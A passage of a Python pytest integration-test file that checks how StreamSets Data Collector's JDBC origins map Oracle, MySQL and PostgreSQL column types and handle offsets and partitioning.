('timestamp with time zone', "TIMESTAMP'1998-1-3 6:00:00-5:00'", 'ZONED_DATETIME', '1998-01-03T06:00:00-05:00'),
('timestamp with local time zone', "TIMESTAMP'1998-1-4 6:00:00-5:00'", 'ZONED_DATETIME', '1998-01-04T11:00:00Z'),
('long', "'LONG'", 'STRING', 'LONG'),
('blob', "utl_raw.cast_to_raw('BLOB')", 'BYTE_ARRAY', 'QkxPQg=='),
('clob', "'CLOB'", 'STRING', 'CLOB'),
('nclob', "'NCLOB'", 'STRING', 'NCLOB'),
('XMLType', "xmltype('<a></a>')", 'STRING', '<a></a>')
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_multitable_oracle_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible Oracle types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id number primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
        # Since we are controlling types, we want to check explicit values inside the record rather than the Python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['DATA_COLUMN'].type == expected_type
assert null_record.field['DATA_COLUMN'].type == expected_type
assert record.field['DATA_COLUMN']._data['value'] == expected_value
assert null_record.field['DATA_COLUMN'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
# SDC-11324: JDBC MultiTable origin can create duplicate offsets
@database('mysql')
def test_jdbc_multitable_duplicate_offsets(sdc_builder, sdc_executor, database):
"""Validate that we will not create duplicate offsets. """
table_name = get_random_string(string.ascii_lowercase, 10)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": table_name}]
origin.max_batch_size_in_records = 1
trash = pipeline_builder.add_stage('Trash')
origin >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
        # We should have read all the rows from ROWS_IN_DATABASE exactly once
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == len(ROWS_IN_DATABASE)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == len(ROWS_IN_DATABASE)
# And most importantly, validate offset
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
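        # The committed offset key encodes the table name together with its partitioning settings; the value
        # 'id=3' assumes ROWS_IN_DATABASE contains the ids 1-3, so the last committed offset is the last row read.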
expected_offset = {
f"tableName={table_name};;;partitioned=false;;;partitionSequence=-1;;;partitionStartOffsets=;;;partitionMaxOffsets=;;;usingNonIncrementalLoad=false": "id=3",
"$com.streamsets.pipeline.stage.origin.jdbc.table.TableJdbcSource.offset.version$": "2"
}
assert offset['offsets'] == expected_offset
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
# SDC-11326: JDBC MultiTable origin forgets offset of non-incremental table on consecutive execution
@database('mysql')
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_lost_nonincremental_offset(sdc_builder, sdc_executor, database):
"""Validate the origin does not loose non-incremental offset on various runs."""
table_name = get_random_string(string.ascii_lowercase, 10)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": table_name, "enableNonIncremental": True}]
origin.max_batch_size_in_records = 1
trash = pipeline_builder.add_stage('Trash')
origin >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=False),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
# We should have read all the records
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == len(ROWS_IN_DATABASE)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == len(ROWS_IN_DATABASE)
# And most importantly, validate offset
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
expected_offset = {
f"tableName={table_name};;;partitioned=false;;;partitionSequence=-1;;;partitionStartOffsets=;;;partitionMaxOffsets=;;;usingNonIncrementalLoad=true": "completed=true",
"$com.streamsets.pipeline.stage.origin.jdbc.table.TableJdbcSource.offset.version$": "2"
}
assert offset['offsets'] == expected_offset
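        # Re-running the pipeline several times must neither re-read the fully-consumed non-incremental table
        # ('completed=true' above) nor change the committed offset; that is the regression covered by SDC-11326.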
for _ in range(5):
sdc_executor.start_pipeline(pipeline)
            # Since the pipeline won't read anything, give it a few seconds to "idle"
time.sleep(2)
sdc_executor.stop_pipeline(pipeline)
# And it really should not have read anything!
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 0
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
# And offset should not have changed
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
assert offset['offsets'] == expected_offset
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.9.0')
@database('oracle')
def test_jdbc_multitable_oracle_split_by_timestamp_with_timezone(sdc_builder, sdc_executor, database):
"""Make sure that we can properly partition TIMESTAMP WITH TIMEZONE type."""
table_name = get_random_string(string.ascii_uppercase, 20)
table_name_dest = get_random_string(string.ascii_uppercase, 20)
connection = database.engine.connect()
comparing_query = f"""(
select * from {table_name}
minus
select * from {table_name_dest}
) union (
select * from {table_name_dest}
minus
select * from {table_name}
)"""
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
ID number primary key,
TZ timestamp(6) with time zone
)
""")
# Create destination table
connection.execute(f"""CREATE TABLE {table_name_dest} AS SELECT * FROM {table_name} WHERE 1=0""")
# Insert a few rows
for m in range(0, 5):
for s in range(0, 59):
connection.execute(f"INSERT INTO {table_name} VALUES({m*100+s}, TIMESTAMP'2019-01-01 10:{m}:{s}-5:00')")
connection.execute("commit")
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{
"tablePattern": f'%{table_name}%',
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["TZ"],
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "30",
"maxNumActivePartitions": -1
}]
origin.number_of_threads = 2
origin.maximum_pool_size = 2
origin.max_batch_size_in_records = 30
finisher = builder.add_stage('Pipeline Finisher Executor')
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
FIELD_MAPPINGS = [dict(field='/ID', columnName='ID'),
dict(field='/TZ', columnName='TZ')]
destination = builder.add_stage('JDBC Producer')
destination.set_attributes(default_operation='INSERT',
table_name=table_name_dest,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
origin >> destination
origin >= finisher
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
        # Insert a few more rows and validate the outcome again
for m in range(6, 8):
for s in range(0, 59):
connection.execute(f"INSERT INTO {table_name} VALUES({m*100+s}, TIMESTAMP'2019-01-01 10:{m}:{s}-5:00')")
connection.execute("commit")
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
finally:
logger.info('Dropping table %s and %s in %s database ...', table_name, table_name_dest, database.type)
connection.execute(f"DROP TABLE {table_name}")
connection.execute(f"DROP TABLE {table_name_dest}")
def _get_date_from_days(d):
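    """Convert a day offset into a date relative to the Unix epoch, e.g. _get_date_from_days(365) -> 1971-01-01."""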
return datetime.date(1970, 1, 1) + datetime.timedelta(days=d)
@database('oracle')
def test_jdbc_multitable_oracle_split_by_date(sdc_builder, sdc_executor, database):
"""Make sure that we can properly partition DATE type.
More precisely, we want to run this pipeline:
multitable >> jdbc
multitable >= finisher
    With more than one thread and using a DATE column as an offset column.
    This feature was not available until version 3.11.0; the issue was detected
    and solved in ESC-513.
"""
table_name = get_random_string(string.ascii_uppercase, 20)
table_name_dest = get_random_string(string.ascii_uppercase, 20)
connection = database.engine.connect()
comparing_query = f"""(
select * from {table_name}
minus
select * from {table_name_dest}
) union (
select * from {table_name_dest}
minus
select * from {table_name}
)"""
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
ID number primary key,
DT date
)
""")
# Create destination table
connection.execute(f"""CREATE TABLE {table_name_dest} AS SELECT * FROM {table_name} WHERE 1=0""")
# Insert a few rows
for m in range(0, 5):
for s in range(0, 59):
identifier = 100 * m + s
connection.execute(
f"INSERT INTO {table_name} VALUES({identifier}, DATE'{_get_date_from_days(identifier)}')"
)
connection.execute("commit")
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
# Partition size is set to 259200000 which corresponds to 30 days in ms,
# since dates are translated to timestamps
origin.table_configs = [{
"tablePattern": f'%{table_name}%',
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["DT"], # Should cause SDC < 3.11.0 to throw an UnsupportedOperationException
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "259200000", # 30 days = 30*24*60*60*1000 (259200000)ms
"maxNumActivePartitions": 2
}]
origin.number_of_threads = 2
origin.maximum_pool_size = 2
finisher = builder.add_stage('Pipeline Finisher Executor')
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
FIELD_MAPPINGS = [dict(field='/ID', columnName='ID'),
dict(field='/DT', columnName='DT')]
destination = builder.add_stage('JDBC Producer')
destination.set_attributes(default_operation='INSERT',
table_name=table_name_dest,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
origin >> destination
origin >= finisher
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
        # Insert a few more rows and validate the outcome again
for m in range(6, 8):
for s in range(0, 59):
identifier = 100 * m + s
connection.execute(
f"INSERT INTO {table_name} VALUES({identifier}, DATE'{_get_date_from_days(identifier)}')"
)
connection.execute("commit")
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
finally:
logger.info('Dropping table %s and %s in %s database ...', table_name, table_name_dest, database.type)
connection.execute(f"DROP TABLE {table_name}")
connection.execute(f"DROP TABLE {table_name_dest}")
@sdc_min_version('3.9.0')
@database('mysql')
def test_jdbc_multitable_consumer_origin_high_resolution_timestamp_offset(sdc_builder, sdc_executor, database):
"""
    Check that the JDBC Multitable origin can retrieve records from a table when using a high-resolution
    timestamp (sub-millisecond precision) as the offset. The records read must have a timestamp greater than the
    timestamp used as the initial offset.
Pipeline looks like:
jdbc_multitable_consumer >> trash
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = f'{src_table_prefix}_{get_random_string(string.ascii_lowercase, 20)}'
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'%{src_table_prefix}%',
'overrideDefaultOffsetColumns': True,
'offsetColumns': ['added'],
'offsetColumnToInitialOffsetValue': [{
'key': 'added',
'value': '${time:extractNanosecondsFromString(' +
'"1996-12-02 00:00:00.020111000")}'
}]
}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
connection = database.engine.connect()
# Create table
logger.info('Creating table %s in %s database ...', table_name, database.type)
connection.execute(f"""
CREATE TABLE {table_name}(
id INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
name varchar(100) NOT NULL,
age INT UNSIGNED NOT NULL,
added TIMESTAMP(6) NOT NULL
)
""")
# Insert rows
logger.info('Adding four rows into %s database ...', database.type)
connection.execute(f'INSERT INTO {table_name} VALUES(1, "Charly", 14, "2005-02-08 14:00:00.100105002")')
connection.execute(f'INSERT INTO {table_name} VALUES(2, "Paco", 28, "1992-05-25 11:00:00.000201010")')
connection.execute(f'INSERT INTO {table_name} VALUES(3, "Eugenio", 21, "1996-12-01 23:00:00.020111")')
connection.execute(f'INSERT INTO {table_name} VALUES(4, "Romualdo", 19, "2000-06-15 18:30:00.10523121")')
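    # Only the rows with a timestamp strictly greater than the initial offset (1996-12-02 00:00:00.020111000)
    # should be read, i.e. Romualdo (2000) and Charly (2005); Paco (1992) and Eugenio (1996-12-01) fall before it.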
try:
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
name_id_from_output = [(record.field['name'], record.field['id'])
for record in snapshot[jdbc_multitable_consumer].output]
assert len(name_id_from_output) == 2
assert name_id_from_output == [('Romualdo', 4), ('Charly', 1)]
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
connection.execute(f'DROP TABLE {table_name}')
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_consumer_partitioned_large_offset_gaps(sdc_builder, sdc_executor, database):
"""
    Ensure that the multi-table JDBC origin can handle large gaps between offset column values in partitioned mode.
    The destination is trash, and there is a finisher waiting for the no-more-data event.
    The pipeline will be started, and we will capture a snapshot spanning two batches (to ensure all expected rows
    are covered), then assert that the captured rows match the expected data.
This is a test for SDC-10053
"""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{
"tablePattern": f'{table_name}',
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "1000000",
"maxNumActivePartitions": -1
}])
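    # With partitionSize=1000000, the gap between id=3 and the extra row id=5000000 spans several partitions
    # that contain no rows at all; SDC-10053 is about the origin still reaching and emitting the row after the gap.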
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
jdbc_multitable_consumer >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding four rows into %s table, with a large gap in the primary keys ...', table_name)
connection = database.engine.connect()
rows_with_gap = ROWS_IN_DATABASE + [{'id': 5000000, 'name': 'Evil Jeff'}]
connection.execute(table.insert(), rows_with_gap)
connection.close()
sdc_executor.add_pipeline(pipeline)
# need to capture two batches, one for row IDs 1-3, and one for the last row after the large gap
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, batches=2, start_pipeline=True).snapshot
rows_from_snapshot = [(record.get_field_data('/name').value, record.get_field_data('/id').value)
for batch in snapshot.snapshot_batches
for record in batch.stage_outputs[jdbc_multitable_consumer.instance_name].output]
expected_data = [(row['name'], row['id']) for row in rows_with_gap]
logger.info('Actual %s expected %s', rows_from_snapshot, expected_data)
assert rows_from_snapshot == expected_data
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.0.0.0')
@database('mysql')
# https://dev.mysql.com/doc/refman/8.0/en/data-types.html
# We don't support BIT generally (the driver is doing funky 'random' mappings on certain versions)
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('TINYINT', '-128', 'SHORT', -128),
('TINYINT UNSIGNED', '255', 'SHORT', 255),
('SMALLINT', '-32768', 'SHORT', -32768),
('SMALLINT UNSIGNED', '65535', 'SHORT', -1), # Support for unsigned isn't entirely correct!
('MEDIUMINT', '-8388608', 'INTEGER', '-8388608'),
('MEDIUMINT UNSIGNED', '16777215', 'INTEGER', '16777215'),
('INT', '-2147483648', 'INTEGER', '-2147483648'),
('INT UNSIGNED', '4294967295', 'INTEGER', '-1'), # Support for unsigned isn't entirely correct!
('BIGINT', '-9223372036854775807', 'LONG', '-9223372036854775807'),
('BIGINT UNSIGNED', '18446744073709551615', 'LONG', '-1'), # Support for unsigned isn't entirely correct!
('DECIMAL(5, 2)', '5.20', 'DECIMAL', '5.20'),
('NUMERIC(5, 2)', '5.20', 'DECIMAL', '5.20'),
('FLOAT', '5.2', 'FLOAT', '5.2'),
('DOUBLE', '5.2', 'DOUBLE', '5.2'),
# ('BIT(8)',"b'01010101'", 'BYTE_ARRAY', 'VQ=='),
('DATE', "'2019-01-01'", 'DATE', 1546300800000),
('DATETIME', "'2019-01-01 5:00:00'", 'DATETIME', 1546318800000),
('TIMESTAMP', "'2019-01-01 5:00:00'", 'DATETIME', 1546318800000),
('TIME', "'5:00:00'", 'TIME', 18000000),
('YEAR', "'2019'", 'DATE', 1546300800000),
('CHAR(5)', "'Hello'", 'STRING', 'Hello'),
('VARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('BINARY(5)', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('VARBINARY(5)', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('BLOB', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('TEXT', "'Hello'", 'STRING', 'Hello'),
("ENUM('a', 'b')", "'a'", 'STRING', 'a'),
("set('a', 'b')", "'a,b'", 'STRING', 'a,b'),
("POINT", "POINT(1, 1)", 'BYTE_ARRAY', 'AAAAAAEBAAAAAAAAAAAA8D8AAAAAAADwPw=='),
("LINESTRING", "LineString(Point(0,0), Point(10,10), Point(20,25), Point(50,60))", 'BYTE_ARRAY',
'AAAAAAECAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkQAAAAAAAACRAAAAAAAAANEAAAAAAAAA5QAAAAAAAAElAAAAAAAAATkA='),
("POLYGON",
"Polygon(LineString(Point(0,0),Point(10,0),Point(10,10),Point(0,10),Point(0,0)),LineString(Point(5,5),Point(7,5),Point(7,7),Point(5,7),Point(5,5)))",
'BYTE_ARRAY',
'AAAAAAEDAAAAAgAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJEAAAAAAAAAAAAAAAAAAACRAAAAAAAAAJEAAAAAAAAAAAAAAAAAAACRAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAUQAAAAAAAABRAAAAAAAAAHEAAAAAAAAAUQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAUQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAUQA=='),
("JSON", "'{\"a\":\"b\"}'", 'STRING', '{\"a\": \"b\"}'),
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_multitable_mysql_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible Mysql types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build(f"MySQL Type {sql_type} with value {insert_fragment}").configure_for_environment(
database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
        # Since we are controlling types, we want to check explicit values inside the record rather than the Python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.0.0.0')
@database('postgresql')
# https://www.postgresql.org/docs/11/datatype.html
# Not testing 'serial' family explicitly as that is just an alias
# Not supporting tsvector tsquery as that doesn't seem fit for us
# bit(n) is not supported
# xml is not supported
# domain types (as a category are not supported)
# pg_lsn not supported
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('smallint', '-32768', 'SHORT', -32768),
('integer', '2147483647', 'INTEGER', '2147483647'),
('bigint', '-9223372036854775808', 'LONG', '-9223372036854775808'),
('decimal(5,2)', '5.20', 'DECIMAL', '5.20'),
('numeric(5,2)', '5.20', 'DECIMAL', '5.20'),
('real', '5.20', 'FLOAT', '5.2'),
('double precision', '5.20', 'DOUBLE', '5.2'),
('money', '12.34', 'DOUBLE', '12.34'),
('char(5)', "'Hello'", 'STRING', 'Hello'),
('varchar(5)', "'Hello'", 'STRING', 'Hello'),
('text', "'Hello'", 'STRING', 'Hello'),
('bytea', "'\\xDEADBEEF'", 'BYTE_ARRAY', '3q2+7w=='),
('timestamp', "'2003-04-12 04:05:06'", 'DATETIME', 1050120306000),
('timestamp with time zone', "'2003-04-12 04:05:06 America/New_York'", 'DATETIME', 1050134706000),
# For PostgreSQL, we don't create ZONED_DATETIME
('date', "'2019-01-01'", 'DATE', 1546300800000),
('time', "'5:00:00'", 'TIME', 18000000),
('time with time zone', "'04:05:06-08:00'", 'TIME', 43506000),
('interval', "INTERVAL '1' YEAR", 'STRING', '1 years 0 mons 0 days 0 hours 0 mins 0.00 secs'),
('boolean', "true", 'BOOLEAN', True),
('ai', "'sad'", 'STRING', 'sad'),
('point', "'(1, 1)'", 'STRING', '(1.0,1.0)'),
('line', "'{1, 1, 1}'", 'STRING', '{1.0,1.0,1.0}'),
('lseg', "'((1,1)(2,2))'", 'STRING', '[(1.0,1.0),(2.0,2.0)]'),
('box', "'(1,1)(2,2)'", 'STRING', '(2.0,2.0),(1.0,1.0)'),
('path', "'((1,1),(2,2))'", 'STRING', '((1.0,1.0),(2.0,2.0))'),
('polygon', "'((1,1),(2,2))'", 'STRING', '((1.0,1.0),(2.0,2.0))'),
('circle', "'<(1,1),5>'", 'STRING', '<(1.0,1.0),5.0>'),
('inet', "'127.0.0.1/16'", 'STRING', '127.0.0.1/16'),
('cidr', "'127.0.0.0/16'", 'STRING', '127.0.0.0/16'),
('macaddr', "'08:00:2b:01:02:03'", 'STRING', '08:00:2b:01:02:03'),
# ('macaddr8', "'08:00:2b:01:02:03'", 'STRING', '08:00:2b:ff:fe:01:02:03'),
# ('bit(8)', "b'10101010'", 'BYTE_ARRAY', '08:00:2b:ff:fe:01:02:03'), # Doesn't work at all today
('bit varying(3)', "b'101'", 'STRING', '101'),
('uuid', "'a0eebc99-9c0b-4ef8-bb6d-6bb9bd380a11'", 'STRING', 'a0eebc99-9c0b-4ef8-bb6d-6bb9bd380a11'),
# ('xml', "'<foo>bar</foo>'", 'STRING', ''), # Doesn't work properly today
("json", "'{\"a\":\"b\"}'", 'STRING', '{"a":"b"}'),
("jsonb", "'{\"a\":\"b\"}'", 'STRING', '{"a": "b"}'),
("integer[3][3]", "'{{1,2,3},{4,5,6},{7,8,9}}'", 'STRING', '{{1,2,3},{4,5,6},{7,8,9}}'),
("ct", "ROW(1, 2)", 'STRING', '(1,2)'),
("int4range", "'[1,2)'", 'STRING', '[1,2)'),
("int8range", "'[1,2)'", 'STRING', '[1,2)'),
("numrange", "'[1,2)'", 'STRING', '[1,2)'),
("tsrange", "'[2010-01-01 14:30, 2010-01-01 15:30)'", 'STRING', '["2010-01-01 14:30:00","2010-01-01 15:30:00")'),
("tstzrange", "'[2010-01-01 14:30 America/New_York, 2010-01-01 15:30 America/New_York)'", 'STRING',
'["2010-01-01 19:30:00+00","2010-01-01 20:30:00+00")'),
("daterange", "'[2010-01-01, 2010-01-02)'", 'STRING', '[2010-01-01,2010-01-02)'),
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_postgresql_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible PostgreSQL types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create enum type conditionally
connection.execute(f"""
DO
$$
BEGIN
IF NOT EXISTS (SELECT * FROM pg_type typ
INNER JOIN pg_namespace nsp ON nsp.oid = typ.typnamespace
WHERE nsp.nspname = current_schema() AND typ.typname = 'ai') THEN
CREATE TYPE ai AS ENUM ('sad', 'ok', 'happy');
END IF;
END;
$$
LANGUAGE plpgsql;
""")
# Create enum complex type conditionally
connection.execute(f"""
DO
$$
BEGIN
IF NOT EXISTS (SELECT * FROM pg_type typ
INNER JOIN pg_namespace nsp ON nsp.oid = typ.typnamespace
WHERE nsp.nspname = current_schema() AND typ.typname = 'ct') THEN
CREATE TYPE ct AS (a int, b int);
END IF;
END;
$$
LANGUAGE plpgsql;
""")
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
        # Since we are controlling types, we want to check explicit values inside the record rather than the Python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.0.0.0')
@database('sqlserver')
# https://docs.microsoft.com/en-us/sql/t-sql/data-types/data-types-transact-sql?view=sql-server-2017
# hierarchyid types not supported
# Geometry and geography not supported
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('DATE', "'2019-01-01'", 'DATE', 1546300800000),
('DATETIME', "'2004-05-23T14:25:10'", 'DATETIME', 1085322310000),
